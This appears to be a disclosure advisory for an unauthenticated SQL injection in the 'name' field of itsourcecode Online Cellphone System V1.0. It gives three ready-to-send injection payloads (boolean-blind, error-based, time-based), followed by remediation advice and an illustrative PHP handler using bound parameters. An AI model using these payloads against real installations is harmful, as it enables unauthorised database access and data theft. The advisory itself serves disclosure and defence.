# itsourcecode Online Cellphone System V1.0 "/cp/available.php" SQL Injection Vulnerability

## Vulnerability Overview

- **Vulnerability Type**: SQL Injection
- **Affected File**: `/cp/available.php`
- **Vulnerable Parameter**: `name` (multipart/form-data POST parameter)
- **Version**: V1.0
- **Exploitation Conditions**: No login or authorization required

## Impact Scope

- **Product**: Online Cellphone System
- **Vendor**: itsourcecode
- **Risk**: Attackers can exploit this vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, complete system control, and service disruption

## POC Code

### Boolean-based Blind

```
Parameter: MULTIPART name ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload:
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="name"

123' RLIKE (SELECT (CASE WHEN (7589=7589) THEN 123 ELSE 0x28 END))-- Lova
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="foodid"

4
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="address"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="contact"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="city"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="type"

Deliver
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="datep"


------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="savechanges"


------WebKitFormBoundaryuAHfNzJmW7bgnPMB--
```

### Error-based

```
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload:
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="name"

123' OR (SELECT 7145 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(7145=7145,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NQjr
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="foodid"

4
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="address"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="contact"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="city"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="type"

Deliver
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="datep"


------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="savechanges"


------WebKitFormBoundaryuAHfNzJmW7bgnPMB--
```

### Time-based Blind

```
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload:
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="name"

123' AND (SELECT 2159 FROM (SELECT(SLEEP(5)))mIvV)-- NQjr
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="foodid"

4
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="address"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="contact"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="city"

123
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="type"

Deliver
------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="datep"


------WebKitFormBoundaryuAHfNzJmW7bgnPMB
Content-Disposition: form-data; name="savechanges"


------WebKitFormBoundaryuAHfNzJmW7bgnPMB--
```

## Remediation Solutions

1. **Use Prepared Statements and Parameter Binding**: Separate SQL code from user input data; user input values are treated as pure data and will not be interpreted as SQL code.
2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to expected formats.
3. **Minimize Database User Privileges**: Ensure that database connection accounts have only the necessary minimum privileges; avoid using high-privilege accounts such as root or admin for routine operations.
4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and remediate potential security vulnerabilities.
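The following PHP handler is an added example of remediation items 1 to 3 applied to the form fields shown in the POC (`name`, `foodid`, `address`, `contact`, `city`, `type`, `datep`, `savechanges`). It is not the project's own `/cp/available.php`; the table name `orders`, its column names, the database credentials, the `Pickup` value in the type whitelist and the assumption that the handler stores the submitted order are all assumptions made for illustration. The point it demonstrates is that the SQL text is a constant and every user-supplied value reaches MySQL only as a bound parameter, so a quote in `name` cannot terminate the string literal the way the boolean-, error- and time-based payloads above rely on.

```php
<?php
// Added example (not the project's code): hardened handling of the
// multipart POST to /cp/available.php. Table `orders`, its columns and the
// connection details below are assumed, not taken from the advisory.
declare(strict_types=1);

// Whitelist for the `type` field. `Deliver` appears in the POC; `Pickup` is assumed.
const ALLOWED_TYPES = ['Deliver', 'Pickup'];

/**
 * Remediation item 2: validate every field against an expected format and
 * reject on mismatch instead of trying to "clean" the value.
 * Returns [list of error strings, normalized row].
 */
function validate_order(array $post): array
{
    $errors = [];
    $name    = trim((string)($post['name'] ?? ''));
    $foodid  = (string)($post['foodid'] ?? '');
    $address = trim((string)($post['address'] ?? ''));
    $contact = trim((string)($post['contact'] ?? ''));
    $city    = trim((string)($post['city'] ?? ''));
    $type    = (string)($post['type'] ?? '');
    $datep   = trim((string)($post['datep'] ?? ''));

    if ($name === '' || mb_strlen($name) > 100) {
        $errors[] = 'name must be 1-100 characters';
    }
    if (!ctype_digit($foodid)) {               // integer id, nothing else
        $errors[] = 'foodid must be a positive integer';
    }
    if ($address === '' || mb_strlen($address) > 255) {
        $errors[] = 'address must be 1-255 characters';
    }
    if (!preg_match('/^\+?[0-9 \-]{6,20}$/', $contact)) {
        $errors[] = 'contact must be a phone number';
    }
    if (!preg_match('/^[\p{L} .\'-]{1,64}$/u', $city)) {
        $errors[] = 'city contains unexpected characters';
    }
    if (!in_array($type, ALLOWED_TYPES, true)) {
        $errors[] = 'type must be one of ' . implode(', ', ALLOWED_TYPES);
    }
    // Round-trip through DateTime so "2024-02-30" is rejected, not silently shifted.
    $d = DateTime::createFromFormat('Y-m-d', $datep);
    if ($d === false || $d->format('Y-m-d') !== $datep) {
        $errors[] = 'datep must be YYYY-MM-DD';
    }

    return [$errors, [
        'name' => $name, 'foodid' => (int)$foodid, 'address' => $address,
        'contact' => $contact, 'city' => $city, 'type' => $type, 'datep' => $datep,
    ]];
}

/**
 * Remediation item 1: the SQL is a constant string; all values are bound.
 */
function insert_order(PDO $pdo, array $row): int
{
    $stmt = $pdo->prepare(
        'INSERT INTO orders (name, foodid, address, contact, city, type, datep)
         VALUES (:name, :foodid, :address, :contact, :city, :type, :datep)'
    );
    $stmt->bindValue(':name',    $row['name'],    PDO::PARAM_STR);
    $stmt->bindValue(':foodid',  $row['foodid'],  PDO::PARAM_INT);
    $stmt->bindValue(':address', $row['address'], PDO::PARAM_STR);
    $stmt->bindValue(':contact', $row['contact'], PDO::PARAM_STR);
    $stmt->bindValue(':city',    $row['city'],    PDO::PARAM_STR);
    $stmt->bindValue(':type',    $row['type'],    PDO::PARAM_STR);
    $stmt->bindValue(':datep',   $row['datep'],   PDO::PARAM_STR);
    $stmt->execute();
    return (int)$pdo->lastInsertId();
}

if (isset($_POST['savechanges'])) {
    // Remediation item 3: `app_user` is an assumed account granted only
    // INSERT/SELECT on the application schema, never root.
    $pdo = new PDO(
        'mysql:host=127.0.0.1;dbname=cellphone_db;charset=utf8mb4',
        'app_user', getenv('DB_PASSWORD') ?: '',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
        ]
    );

    [$errors, $row] = validate_order($_POST);
    if ($errors !== []) {
        http_response_code(400);
        echo implode("\n", array_map('htmlspecialchars', $errors));
        exit;
    }
    $id = insert_order($pdo, $row);
    echo 'Saved order ' . $id;
}
```

With `PDO::ATTR_EMULATE_PREPARES` set to `false` the statement is prepared by MySQL itself and the `name` value, including any embedded `'` or `--`, is sent as data in a separate packet. Set `PDO::ERRMODE_EXCEPTION` together with a generic error page so that database errors are logged server-side rather than echoed to the client, which is what the error-based payload in the POC depends on.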